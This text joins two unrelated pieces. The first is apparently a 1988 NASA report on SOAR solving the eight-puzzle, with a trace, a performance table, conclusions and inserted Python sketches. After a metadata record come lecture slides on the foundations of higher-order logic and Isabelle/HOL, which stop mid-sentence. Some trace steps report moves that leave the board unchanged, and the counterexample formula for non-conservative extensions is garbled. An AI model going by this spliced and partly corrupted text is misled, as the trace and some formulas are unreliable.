Learn status: on all-goals print trace 0 G: G1 1 P: P3 EIGHT-PUZZLE 2 S: S4 3 O: O34 MOVE-TILE(C22) C22(S4) $\rightarrow$ S35 <table> <thead> <tr> <th>2</th> <th>8</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>0</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> C22(S4) $\rightarrow$ S35 4 S: S35 5 $\Rightarrow$: G: G185 (UNDECIDED OPERATOR TIE) 6 P: P186 SELECTION 7 S: S42 8 O: (O47 O46 O45) 9 $\Rightarrow$: G: G190 (EVALUATE-OBJECT (MOVE-TILE(C21)) OPERATOR NO-CHANGE) 10 P: P3 EIGHT-PUZZLE 11 S: S35 12 O: O40 MOVE-TILE(C12) C21(S35) $\rightarrow$ S48 <table> <thead> <tr> <th>2</th> <th>0</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> C12(S35) --> S53 <table> <thead> <tr> <th>2</th> <th>8</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>1</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> Duplicate chunk Build: P200 Duplicate chunk Build: P202 Build: P204 Build: P205 13 S: S53 14 O: O41 MOVE-TILE(C21) C21(S35) --> S59 <table> <thead> <tr> <th>2</th> <th>0</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> 15 S: S59 16 O: O74 MOVE-TILE(C11) C11(S59) --> S64 <table> <thead> <tr> <th>0</th> <th>2</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> 2-6 17 S: S64 18 O: O76 MOVE-TILE(C12) C12(S64) --> S70 <table> <thead> <tr> <th>1</th> <th>2</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> 19 S: S70 20 O: O80 MOVE-TILE(C22) C22(S70) --> S77 <table> <thead> <tr> <th>1</th> <th>2</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> 21 S: S77 goal SOLVE-EIGHT-PUZZLE achieved >(print-stats) Soar 4.4 (external release: created April 19, 1987) Run statistics on July 26, 1988 81 productions (1345 / 5703 nodes) 229.41667 seconds elapsed (43.133335 seconds chunking overhead) 21 decision cycles (10924.604 ms per cycle) 46 elaboration cycles (4987.319 ms per cycle) (2.1904762 e cycles/d cycle) 211 production firings (1087.2828 ms per firing) (4.5869565 productions in parallel) 717 RHS actions after initialization (319.96747 ms per action) 226 mean working memory size (339 maximum, 296 current) 2890 mean token memory size (10696 maximum, 3893 current) 22363 total number of tokens added 18470 total number of tokens removed 40833 token changes (5.6184134 ms per change) (56.7125 changes/action) The particular implementation of this problem in SOAR requires twelve productions, which can be divided as follows: (1) four rules for setting-up the problem space; (2) one rule to create an operator instantiation; (3) two rules for applying an instantiated operator; (4) one rule for search control; (5) one rule for monitoring states; and (6) three rules for evaluating operators. 
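The MOVE-TILE operator in the trace simply slides a named tile into the adjacent blank cell. Outside of SOAR, and purely for illustration (the index-based cell naming, the goal layout, and the evaluation function below are assumptions for this sketch, not taken from the report's production set), the state and operator can be pictured as follows.

```python
# Illustrative eight-puzzle state and MOVE-TILE operator, independent of SOAR.
# A state is a 9-tuple read row by row; 0 marks the blank cell.

GOAL = (1, 2, 3, 8, 0, 4, 7, 6, 5)   # a common eight-puzzle goal layout (an assumption here)

def neighbors(i):
    """Indices of cells adjacent to board index i on a 3x3 board."""
    r, c = divmod(i, 3)
    for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
        if 0 <= r + dr < 3 and 0 <= c + dc < 3:
            yield (r + dr) * 3 + (c + dc)

def move_tile(state, cell):
    """Apply MOVE-TILE(cell): slide the tile in `cell` into the adjacent blank, if legal."""
    blank = state.index(0)
    if cell not in neighbors(blank):
        return None                    # operator not applicable in this state
    s = list(state)
    s[blank], s[cell] = s[cell], 0
    return tuple(s)

def evaluate(state, next_state):
    """Crude evaluation: favor a move that puts a tile into its goal position."""
    placed_now = sum(a == b and a != 0 for a, b in zip(next_state, GOAL))
    placed_before = sum(a == b and a != 0 for a, b in zip(state, GOAL))
    return 1 if placed_now > placed_before else 0
```

The `evaluate` function mirrors the search-control idea discussed next: a next state that moves a tile into its final position is judged favorably (an evaluation of 1).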
While the rules described are specific to this problem, encoding other tasks typically involve a similar division of a problem and hence a similar division of rules. LEARNING The chunk below is an example of a rule that becomes part of production memory during the session outlined above. In more transparent form the rule states: If any tile is being moved into its final position Then the next state will yield an evaluation of 1, i.e., the next state will be evaluated favorably This particular rule is one that is created because of the current implementation; the search control rule creates a worst preference for those operators not placing tiles in their desired locations. Other search control productions are responsible for the creation of chunks more in line with their method of search control (4). The search control rules are of importance in the outcome of the problem-solving process. To explore the effect of these rules on the parameters to measure performance, sample runs were performed using three different search control strategies. The results are presented in Table 1. The third column refers to a search control procedure that rejects an operator that will move back a tile into its previous location. The fourth column refers to a search control mechanism that creates a worst preference to a tile that is to be moved out of its desired location. The fifth column corresponds to no <table> <thead> <tr> <th>Type of run</th> <th>Data</th> <th>Reject * undo</th> <th>Worst * Preference</th> <th>No Search</th> </tr> </thead> <tbody> <tr> <td>No Learning</td> <td>number of productions</td> <td>73</td> <td>74</td> <td>82</td> </tr> <tr> <td></td> <td>elapsed time</td> <td>177</td> <td>53</td> <td>268</td> </tr> <tr> <td></td> <td>decision cycles</td> <td>48</td> <td>21</td> <td>39</td> </tr> <tr> <td></td> <td>elaboration cycles</td> <td>84</td> <td>43</td> <td>73</td> </tr> <tr> <td></td> <td>production firings</td> <td>442</td> <td>181</td> <td>383</td> </tr> <tr> <td></td> <td>working memory elements</td> <td>276</td> <td>301</td> <td>339</td> </tr> <tr> <td>Learning</td> <td>number of productions</td> <td>81</td> <td>77</td> <td>72</td> </tr> <tr> <td></td> <td>elapsed time</td> <td>112 (24)</td> <td>54 (9)</td> <td>281 (114)</td> </tr> <tr> <td></td> <td>decision cycles</td> <td>30</td> <td>21</td> <td>62</td> </tr> <tr> <td></td> <td>elaboration cycles</td> <td>55</td> <td>43</td> <td>94</td> </tr> <tr> <td></td> <td>production firings</td> <td>303</td> <td>182</td> <td>572</td> </tr> <tr> <td></td> <td>working memory elements</td> <td>323</td> <td>301</td> <td>453</td> </tr> <tr> <td>Learned</td> <td>number of productions</td> <td>81</td> <td>77</td> <td>82</td> </tr> <tr> <td></td> <td>elapsed time</td> <td>51 (0)</td> <td>28 (0)</td> <td>48 (0)</td> </tr> <tr> <td></td> <td>decision cycles</td> <td>12</td> <td>12</td> <td>12</td> </tr> <tr> <td></td> <td>elaboration cycles</td> <td>29</td> <td>25</td> <td>29</td> </tr> <tr> <td></td> <td>production firings</td> <td>120</td> <td>104</td> <td>116</td> </tr> <tr> <td></td> <td>working memory elements</td> <td>295</td> <td>279</td> <td>291</td> </tr> <tr> <td></td> <td>chunks used</td> <td>6</td> <td>3</td> <td>7</td> </tr> </tbody> </table> Table 1: Eight-Puzzle Results prespecified search control strategy. Each row contains data for each type of run. 
The data contain the number of productions in the system, the elapsed time to complete the task, the number of decision cycles, the number of elaboration cycles, the number of production firings and the maximum number of working memory elements. The last row, corresponding to runs that have already "learned," indicates the number of chunks that were fired during a problem solving session. The numbers in parentheses indicate the amount of time required for chunking. As expected, chunking added productions to each system. However, a learned system did not chunk again. Also as expected, a "stronger" search control mechanism (column Four) corresponded to a better overall performance: fewer cycles, fewer rule firings, more efficient memory and more efficient chunking. The reason for this is a priori control of the preferences in the "worst" preference strategy. Applying specific preference orientations in the search control strategy appears to be an effective way to structure a problem implementation (1,4). Finally, it is noted that even without a specified search control strategy (column Five), SOAR's default strategy is sufficient to solve this problem prior to chunking. **CONCLUSIONS** A preliminary examination of SOAR has been performed and, from the above-mentioned results, the following conclusions are drawn: - Learning is a beneficial aspect of automated problem solving in that code can be made more efficient and previously unrecognized knowledge, in the form of chunks, can be created. - Problem decomposition is the key to an efficient (or even successful implementation). The search control mechanism(s) used in a specific implementation strongly influences the problem-solving process and the learning process. • Measuring the difficulty of a problem is a nontrivial task. The performance criteria measured by SOAR need to be scrutinized before a definitive measure can be ascertained. It is clear that additional studies are needed, with more practical problems (such as those presented in (4)), to see if the SOAR architecture can be useful in NASA-related applications. Acknowledgment The author thanks Lui Wang, Aerospace Engineer for the Artificial Intelligence Section, for his assistance with using the microEXPLORER™ and the Lisp environment. References
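One way to picture why the "Learned" runs in Table 1 need fewer decision cycles is to think of a chunk as a cached summary of a completed subgoal. The sketch below is only that analogy expressed in Python; it is not SOAR's chunking mechanism, and `ChunkingSolver` and `solve_subgoal` are invented names.

```python
# Loose analogy: a learned "chunk" maps a subgoal's relevant working-memory
# conditions to the result the subgoal search previously produced, so the
# search need not be repeated.  This is NOT SOAR's actual implementation.

class ChunkingSolver:
    def __init__(self, solve_subgoal):
        self.solve_subgoal = solve_subgoal   # expensive look-ahead / subgoal search
        self.chunks = {}                     # learned condition -> result summaries

    def decide(self, conditions):
        key = frozenset(conditions.items())
        if key in self.chunks:               # a chunk fires: no subgoal is created
            return self.chunks[key]
        result = self.solve_subgoal(conditions)   # impasse -> subgoal -> search
        self.chunks[key] = result            # build a chunk summarizing the subgoal
        return result
```

On a repeated run the table is hit instead of the look-ahead being redone, which matches the qualitative picture above: no new chunks are built and the cycle counts drop.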
{"Source-Url": "https://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19890010689.pdf", "len_cl100k_base": 4134, "olmocr-version": "0.1.50", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 24288, "total-output-tokens": 4478, "length": "2e12", "weborganizer": {"__label__adult": 0.00033593177795410156, "__label__art_design": 0.0005574226379394531, "__label__crime_law": 0.0004248619079589844, "__label__education_jobs": 0.0045318603515625, "__label__entertainment": 0.00012683868408203125, "__label__fashion_beauty": 0.00021445751190185547, "__label__finance_business": 0.00037598609924316406, "__label__food_dining": 0.0003924369812011719, "__label__games": 0.0006642341613769531, "__label__hardware": 0.001944541931152344, "__label__health": 0.0005564689636230469, "__label__history": 0.00041365623474121094, "__label__home_hobbies": 0.00017380714416503906, "__label__industrial": 0.0010843276977539062, "__label__literature": 0.000415802001953125, "__label__politics": 0.0003752708435058594, "__label__religion": 0.0005049705505371094, "__label__science_tech": 0.254150390625, "__label__social_life": 0.00019490718841552737, "__label__software": 0.020782470703125, "__label__software_dev": 0.71044921875, "__label__sports_fitness": 0.0003256797790527344, "__label__transportation": 0.0008611679077148438, "__label__travel": 0.00022542476654052737}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 14664, 0.11403]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 14664, 0.28286]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 14664, 0.88828]], "google_gemma-3-12b-it_contains_pii": [[0, 551, false], [551, 1106, null], [1106, 3293, null], [3293, 5439, null], [5439, 5467, null], [5467, 5779, null], [5779, 6501, null], [6501, 6925, null], [6925, 7218, null], [7218, 8622, null], [8622, 9746, null], [9746, 11752, null], [11752, 13581, null], [13581, 14124, null], [14124, 14664, null]], "google_gemma-3-12b-it_is_public_document": [[0, 551, true], [551, 1106, null], [1106, 3293, null], [3293, 5439, null], [5439, 5467, null], [5467, 5779, null], [5779, 6501, null], [6501, 6925, null], [6925, 7218, null], [7218, 8622, null], [8622, 9746, null], [9746, 11752, null], [11752, 13581, null], [13581, 14124, null], [14124, 14664, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 14664, null]], "pdf_page_numbers": [[0, 551, 1], [551, 1106, 2], [1106, 3293, 3], [3293, 5439, 4], [5439, 5467, 5], [5467, 5779, 6], [5779, 6501, 7], [6501, 6925, 8], [6925, 7218, 9], [7218, 8622, 10], [8622, 9746, 11], [9746, 11752, 12], [11752, 13581, 13], [13581, 14124, 14], 
[14124, 14664, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 14664, 0.27861]]}
Overview of Chapter 3. Foundations of Higher-Order Logic 3.1 Introduction 3.2 Foundation of HOL 3.3 Conservative Extension of Theories Section 3.1 Introduction to higher-order logic Foundation of higher-order logic Conservative extension of theories 3. Foundations of Higher-Order Logic 3.1 Introduction A bit of history and context - Gottlob Frege proposed a system on which (he thought) all mathematics could be derived (in principle): Begriffsschrift (1879) - Bertrand Russell found paradox in Frege’s system and proposed the Ramified Theory of Types - Wrote Principia Mathematica with Whitehead, an attempt at developing basic mathematics completely formally ("My intellect never recovered from the strain") Russel’s paradox Theorem Let \( S = \{ x \mid x \notin x \} \), then \( S \in S \) if and only if \( S \notin S \) Proof. - If \( S \in S \), then \( S \notin S \). - If \( S \notin S \), then \( S \in S \). Remark - Thus, we found a mathematical contradiction. - Logical point of view: we derived \( F \leftrightarrow \neg F \) where \( F \equiv (S \in S) \); thus, we can derive \( False \), and consequently, every formula. Approaches to avoid inconsistencies - Type theory: - Russel: Use a hierarchy of types to avoid self-referential expressions - A. Church proposed a simple type theory (1940) - many approaches extend Church’s type theory (HOL, Calculus of constructions, etc.) - Set theory is often seen as the basis for mathematics. - Zermelo-Fraenkel, Bernays-Goedel, … - Set theories distinguish between sets and classes. - Consistency maintained as some collections are „too big“ to be sets, e.g., class of all sets is not a set. A class cannot belong to another class (let alone a set)! Set theory Aspects of HOL - Higher-order logic (HOL) is an expressive foundation for - mathematics: analysis, algebra, … - computer science: program correctness, hardware verification, … - Reasoning in HOL is classical. - Still important: modeling of problems (now in HOL). - Still important: deriving relevant reasoning principles. Remark Web-page listing approaches to formalize mathematics and logics: Aspects of HOL (2) - HOL offers safety through strength: ▶ small kernel of constants and axioms ▶ safety via conservative (definitional) extensions - Contrast with ▶ weaker logics (e.g., propositional logic, FOL): can’t define much ▶ axiomatic extensions: can lead to inconsistency Bertrand Russell: “The method of “postulating” what we want has many advantages; they are the same as the advantages of theft over honest toil.” (Introduction to Mathematical Philosophy, 1919) Choice of Isabelle/HOL Rationale for Isabelle/HOL We use Isabelle/HOL, the HOL specialization of the generic proof assistant Isabelle: - HOL vs. set theory: ▶ types are helpful for computer science applications ▶ HOL is sufficiently expressive for most applications (in general, ZF set theory is more expressive) ▶ “If you prefer ML to Lisp, you will probably prefer HOL to ZF” (quote by Larry Paulson) - Isabelle/HOL vs. other HOL systems: pragmatic advantages over the HOL system or PVS - Constructive alternatives for HOL: Coq or Nuprl, classical reasoning not supported About the term „higher-order logic“ 1st-order: supports functions and predicates over individuals (0th-order objects) and quantification of individuals: \[ \forall x, y. R(x, y) \rightarrow R(y, x) \] 2nd-order: supports functions and predicates that have first-order functions as arguments or results and allow quantification over first-order predicates and functions: \[ \forall P. 
\forall m. P(0) \land (\forall n. P(n) \rightarrow P(Suc(n))) \rightarrow P(m) \] "higher order" \( \leftrightarrow \) union of all finite orders

Foundation of HOL

Starting remarks Simplification In the rest of this chapter, we only consider - a core syntax of HOL (not the rich syntax of Isabelle/HOL) - a version of HOL without parameterized types (not the richer type system of Isabelle/HOL; cf. [GordonMelham93] for a version with parametric polymorphism) Goals: - Learn the semantics and axiomatic foundation of HOL - Learn some meta-level properties about HOL - Deepen the understanding of what verification is about

Basic HOL Syntax (1) - Types: \[ \tau ::= \text{bool} \mid \text{ind} \mid \tau \Rightarrow \tau \] - \text{bool} and \text{ind} are also called \( o \) and \( i \) in the literature [Chu40, And86] - no user-defined type constructors, e.g., \text{bool} list - no polymorphic type definitions, e.g., \( \alpha \) list - Terms: Let \( \mathcal{V} \) be a set of variables and \( C \) a set of constants: \[ T ::= \mathcal{V} \mid C \mid (T\,T) \mid \lambda \mathcal{V}.T \] - Terms are simply typed (no type parameters) - Terms of type \text{bool} are called (well-formed) formulas.

HOL Semantics - Intuitively an extension of many-sorted semantics with functions - FOL (w/o sorts): formulas are interpreted in a structure consisting of a domain/universe and functions/predicates \[ \langle D, (f_i)_{i \in F}, (p_i)_{i \in P} \rangle \] - Many-sorted FOL: there is a domain for each sort \( s \in S \) where \( S \) is finite; functions/predicates have a sorted signature: \[ \langle (D_s)_{s \in S}, (f_i)_{i \in F_s}, (p_i)_{i \in P_s} \rangle \] - HOL: the domain \( D \) is indexed by (infinitely many) types - Our presentation ignores polymorphism on the object-logical level; it is treated on the meta-level, though (for a version covering object-level parametric polymorphism cf. [GordonMelham93]).

Universes are prerequisite for HOL models **Definition (Universe)** A collection of sets \( \mathcal{U} \) is called a universe if it satisfies the following closure conditions: - **Inhab**: Each \( X \in \mathcal{U} \) is a nonempty set - **Sub**: If \( X \in \mathcal{U} \) and \( \emptyset \neq Y \subseteq X \), then \( Y \in \mathcal{U} \) - **Prod**: If \( X, Y \in \mathcal{U} \) then \( X \times Y \in \mathcal{U} \), where \( X \times Y \) is the Cartesian product (the set \( \{\{x\}, \{x, y\}\} \) encodes the pair \( (x, y) \)) - **Pow**: If \( X \in \mathcal{U} \) then \( \mathcal{P}(X) = \{Y : Y \subseteq X\} \in \mathcal{U} \) - **Infty**: \( \mathcal{U} \) contains an infinite set of individuals

Remarks on universes \( \mathcal{U} \) - **Representation of function spaces in universes**: \( X \Rightarrow Y \) is the set of all (total) functions from \( X \) to \( Y \), where a function is represented by its graph - For \( X \) and \( Y \) nonempty, \( X \Rightarrow Y \) is a nonempty subset of \( \mathcal{P}(X \times Y) \) - From the closure conditions: If \( X, Y \in \mathcal{U} \), then \( X \Rightarrow Y \in \mathcal{U} \). - Universes have two distinguished sets: - **Unit**: A distinguished set \( \{1\} \) with exactly one element - **Bool**: A distinguished set \( \{T, F\} \) with exactly two elements (existence follows from Infty and Sub)

Frames **Definition (frame)** Let \( \mathcal{U} \) be a universe.
A frame is a collection \((\mathcal{D}_\alpha)_{\alpha \in \tau}\) with \( \mathcal{D}_\alpha \in \mathcal{U} \) for all \( \alpha \in \tau \) and - \( \mathcal{D}_{\text{bool}} = \{T, F\} \) - \( \mathcal{D}_{\text{ind}} = X \) where \( X \) is some infinite set of individuals - \( \mathcal{D}_{\alpha \Rightarrow \beta} \subseteq \mathcal{D}_\alpha \Rightarrow \mathcal{D}_\beta \), i.e. some collection of functions from \( \mathcal{D}_\alpha \) to \( \mathcal{D}_\beta \)

Examples Some of the sets \( \mathcal{D}_{\alpha \Rightarrow \beta} \) might contain, e.g., - the identity function, while others do not - only the computable functions

Interpretations **Definition (Interpretation)** An interpretation \( \langle (\mathcal{D}_\alpha)_{\alpha \in \tau}, \mathcal{J} \rangle \) consists of a frame \((\mathcal{D}_\alpha)_{\alpha \in \tau}\) and a function \( \mathcal{J} \) mapping the constants of type \( \alpha \) to elements of \( \mathcal{D}_\alpha \): - \( \mathcal{J}(\text{True}) = T \) and \( \mathcal{J}(\text{False}) = F \) - \( \mathcal{J}(=_{\alpha \Rightarrow \alpha \Rightarrow \text{bool}}) \) is the identity (equality) relation on \( \mathcal{D}_\alpha \) - \( \mathcal{J}(\longrightarrow_{\text{bool} \Rightarrow \text{bool} \Rightarrow \text{bool}}) \) denotes the implication function over \( \mathcal{D}_{\text{bool}} \), i.e., \[ b \longrightarrow b' = \begin{cases} F & \text{if } b = T \text{ and } b' = F \\ T & \text{otherwise} \end{cases} \]

Interpretations (2) Remark We have to make sure that - the interpretations of the constants are elements of the frame - all definable functions are elements of the frame

Generalized models Definition (Generalized models) An interpretation $\mathcal{M} = \langle (D_\alpha)_{\alpha \in \tau}, J \rangle$ is a (general) model for HOL if there is a binary function $V^\mathcal{M}$ such that for all type-indexed families of variable assignments $\rho = (\rho_\alpha)_{\alpha \in \tau}$: (a) $V^\mathcal{M}(\rho, x_\alpha) = \rho_\alpha(x_\alpha)$ (b) $V^\mathcal{M}(\rho, c) = J(c)$, for constants $c$ (c) $V^\mathcal{M}(\rho, (s_{\alpha \Rightarrow \beta}\, t_\alpha)) = (V^\mathcal{M}(\rho, s))(V^\mathcal{M}(\rho, t))$, i.e., the value of the function $V^\mathcal{M}(\rho, s)$ at the argument $V^\mathcal{M}(\rho, t)$ (d) $V^\mathcal{M}(\rho, \lambda x_\alpha. t_\beta) =$ "the function from $D_\alpha$ into $D_\beta$ whose value for each $z \in D_\alpha$ is $V^\mathcal{M}(\rho[x \leftarrow z], t)$" - If $t$ is a term of type $\alpha$, then $V^\mathcal{M}(\rho, t) \in D_\alpha$.

Generalized Models - Facts (1) - If $\mathcal{M}$ is a general model and $\rho$ a variable assignment, then $V^\mathcal{M}(\rho, t)$ is uniquely determined, for every term $t$. $V^\mathcal{M}(\rho, t)$ is the value of $t$ in $\mathcal{M}$ w.r.t. $\rho$. - This gives rise to the standard notions of satisfiability/validity: - We write $\mathcal{M}, \rho \models \phi$ for $V^\mathcal{M}(\rho, \phi) = T$. - $\phi$ is satisfiable in $\mathcal{M}$ if $\mathcal{M}, \rho \models \phi$ for some variable assignment $\rho$. - $\phi$ is valid in $\mathcal{M}$ if $\mathcal{M}, \rho \models \phi$ for every variable assignment $\rho$. - $\phi$ is valid (in the general sense) if $\phi$ is valid in every general model $\mathcal{M}$.

Generalized Models - Facts (2) - Not all interpretations are general models.
- Closure conditions guarantee that every well-formed term has a value under every assignment, e.g., - closure under functions: the identity function from $D_\alpha$ to $D_\alpha$ must belong to $D_{\alpha \Rightarrow \alpha}$ so that $V^\mathcal{M}(\rho, \lambda x_\alpha. x)$ is defined. - closure under application: - if $D_{N}$ is the set of natural numbers and - $D_{N \Rightarrow N \Rightarrow N}$ contains the addition function $p$ where $p\,x\,y = x + y$, - then $D_{N \Rightarrow N}$ must contain the function $k$ with $k\,x = 2x + 5$, - since $k = V^\mathcal{M}(\rho, \lambda x.\, f\,x\,(f\,x\,y))$ where $\rho(f) = p$ and $\rho(y) = 5$.

3. Foundations of Higher-Order Logic 3.2 Foundation of HOL

Standard models Definition (Standard models) A general model is a standard model iff for all \( \alpha, \beta \in \tau \), \( D_{\alpha \Rightarrow \beta} \) is the set of all functions from \( D_\alpha \) to \( D_\beta \). Remarks - A standard model is a general model, but not necessarily vice versa. - Analogous definitions for satisfiability and validity w.r.t. standard models.

Isabelle/HOL We introduce HOL in Isabelle's meta-logic:

consts - True :: bool - False :: bool - Not :: bool ⇒ bool ("\neg" [40] 40) - If :: [bool, 'a, 'a] ⇒ 'a ("if _ then _ else _") - The :: ('a ⇒ bool) ⇒ 'a (binder "THE" 10) - All :: ('a ⇒ bool) ⇒ bool (binder "\forall" 10) - Ex :: ('a ⇒ bool) ⇒ bool (binder "\exists" 10) - = :: ['a, 'a] ⇒ bool (infix 50) - ∧ :: [bool, bool] ⇒ bool (infixr 35) - ∨ :: [bool, bool] ⇒ bool (infixr 30) - → :: [bool, bool] ⇒ bool (infixr 25)

defs - True_def: True ≡ ((λ x :: bool. x) = (λ x. x)) - All_def: All(P) ≡ (P = (λ x. True)) - Ex_def: Ex(P) ≡ ∀Q. (∀x. P x → Q) → Q - False_def: False ≡ (∀P. P) - not_def: ¬P ≡ P → False - and_def: P ∧ Q ≡ (∀R. (P → Q → R) → R) - or_def: P ∨ Q ≡ (∀R. (P → R) → (Q → R) → R) - if_def: If P x y ≡ THE z :: 'a. (P = True → z = x) ∧ (P = False → z = y)

The axioms and rules of HOL axioms/rules - refl: "t = t" - subst: "⟦ s = t ; P(s) ⟧ ⟹ P(t)" - ext: "(⋀ x. f x = g x) ⟹ (λ x. f x) = (λ x. g x)" - impl: "(P ⟹ Q) ⟹ P → Q" - mp: "⟦ P → Q ; P ⟧ ⟹ Q" - iff: "(P → Q) ⟹ (Q → P) ⟹ (P = Q)" - True_or_False: "(P = True) ∨ (P = False)" - the_eq_trivial: "(THE x. x = b) = (b :: 'a)"

The axioms and rules of HOL (2) Additionally, there is: - universal $\alpha$-, $\beta$-, and $\eta$-congruence on terms (implicitly), - the axiom of infinity, and - the axiom of choice (Hilbert operator). - This is the entire basis!

Properties of HOL Theorem 1 (Soundness of HOL) HOL is sound: if $\vdash \phi$, then $\phi$ is valid in the general/standard sense. Theorem 2 (Incompleteness of HOL) HOL is incomplete w.r.t. standard models: there exist $\phi$ that are valid in the standard sense, but $\not\vdash \phi$. Remark [And86, Chap. 5-7] presents proofs for these theorems. Note, however, that [And86] does not restrict the semantics to models where $D_{\text{ind}}$ is infinite.

Basic ideas - Theories are stepwise extensions of the core theory of HOL - Extensions may introduce new constants and new types - Inconsistencies are avoided by construction - Syntactical mechanisms are used to make extensions more convenient Remark Extensions only introduce names for "things" that already exist in the core theory.

Conservative Extension of Theories Basic definitions Terminology and basic definitions (cf.
[GordonMelham93]): **Definition (Theory)** A (syntactic) theory $T$ is a triple $(\chi, \Sigma, A)$ where - $\chi$ is a set of type names - $\Sigma$ is a set of typed function/constant names using types of $\chi$ - $A$ is a set of axioms over $\Sigma$ **Definition (Consistent)** A theory $T$ is consistent iff $False$ is not provable in $T$: $$A \not \vdash False$$ **Definition (Theory extension)** A theory $T' = (\chi', \Sigma', A')$ is an extension of a theory $T = (\chi, \Sigma, A)$ iff $$\chi \subseteq \chi' \text{ and } \Sigma \subseteq \Sigma' \text{ and } A \subseteq A'.$$ **Definition (Conservative extension)** Let $T = (\chi, \Sigma, A)$ and $Th(T) = \{ \phi \mid A \vdash \phi \}$; a theory extension $T' = (\chi', \Sigma', A')$ of $T$ is conservative iff $$Th(T) = (Th(T') \upharpoonright \Sigma)$$ where $\upharpoonright \Sigma$ restricts sets of formulas to those containing only names in $\Sigma$. **Lemma (Consistency)** If $T'$ is a conservative extension of a consistent theory $T$, then $$False \not \in Th(T')$$ Syntactic schemata for conservative extensions Not every extension is conservative: **Counterexample** Let $T = (\chi, \Sigma, A)$ such that $A$ includes the axioms of HOL and $T$ is consistent. $$T' = (\chi, \Sigma, A \cup \{ f_{\text{bool}} = \text{bool}.x = f x \})$$ is not a conservative extension of $T$. We consider conservative extensions by: - constant definitions - type definitions **Remark** Cf. [GordonMelham93] for other extension schemata Constant definitions are conservative Lemma (Constant definition) A constant definition is a conservative extension. Proof. Proof sketch: • Th(T) ⊆ (Th(T') |Σ) : from definition of Th • (Th(T') |Σ) ⊆ Th(T) : let π' be a proof for φ ∈ (Th(T') |Σ). We unfold any subterm in π' that contains c by c = E into π. π is a proof in T, i.e., φ ∈ Th(T). □ Approaching type definitions Idea - Specify a subset of the elements of an existing type \( r \) - "Copy" the subset and use the copy as value set of the new type \( t \) - Link old and new type by two functions More precisely, the definition of a new type \( t \) is based on: - an existing type \( r \) - a predicate \( S :: r \Rightarrow \text{bool} \), defining a non-empty "subset" of \( r \); - an abstraction function \( \text{Abs}_r :: r \Rightarrow t \) - a representation function \( \text{Rep}_r :: t \Rightarrow r \) - axioms stating a bijection between the set characterized by \( S \) and the new type \( t \). Remark This may seem strange: if a new type is always isomorphic to a subset of an existing type, how is this construction going to lead to a "rich" collection of types for large-scale applications? - But in fact, due to \( \text{ind} \) and \( \Rightarrow \), the types in HOL are already very rich. - Thus, extensions essentially give names to values and types that have already been "expressible" in the "old" theory. - Extensions allow to formulate theorems in a more compact and readable way. We now give two examples revealing the power of type definitions: - Typed sets - Pairs Types for sets We define the new type \( \text{natset} \) containing all sets of natural numbers: - existing type: \( (\text{nat} \Rightarrow \text{bool}) \) - predicate \( S :: (\text{nat} \Rightarrow \text{bool}) \Rightarrow \text{bool}, S \equiv \lambda f. 
